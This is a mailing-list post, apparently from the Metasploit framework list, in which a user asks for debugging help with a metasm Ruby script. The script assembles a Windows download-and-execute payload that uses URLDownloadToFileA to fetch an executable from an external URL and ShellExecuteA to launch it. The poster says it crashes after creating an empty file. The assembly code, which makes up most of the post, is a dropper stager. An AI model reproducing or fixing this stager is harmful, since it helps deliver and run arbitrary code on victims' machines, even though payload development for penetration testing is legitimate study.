Re: Dynamic creation of payload executables with metasm

[John B <johnb.electric () gmail com>]

I'll take a look at that I couldn't find any asm code for the encoder just
hex arrays, and if you've been reading my posts you'll know I'm having
trouble going from hex array back to asm.
thanks

Question # 4 (i think):

Just to test out metasm I tried to create a download execute payload from
scratch using imports just as a test and I'm having trouble getting it to
work following it in ollydbg it calls urldownloadtofile, creates the file in
the dir but either freezes or crashes trying to execute a non existing
memory adddress.  Here is the code if any body is familiar with Metasm and
can point out what I'm doing wrong, the syntax is from there docs and it
throws no error during assembly, but it doesn't get past creating an empty
file.

require 'metasm'

pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS

.entrypoint

push 0
push 0
push PATH
push URL
push 0
call download

push 0
push 0
push 0
push PATH
push CMD
push 0
call execute

ret

.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download

.data

URL db "http://imperiumsec.com/download/hellow.exe";, 0
PATH db "c:/users/john/testd.exe",0
CMD db "open",0

EOS

pe.encode_file 'down.exe'

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework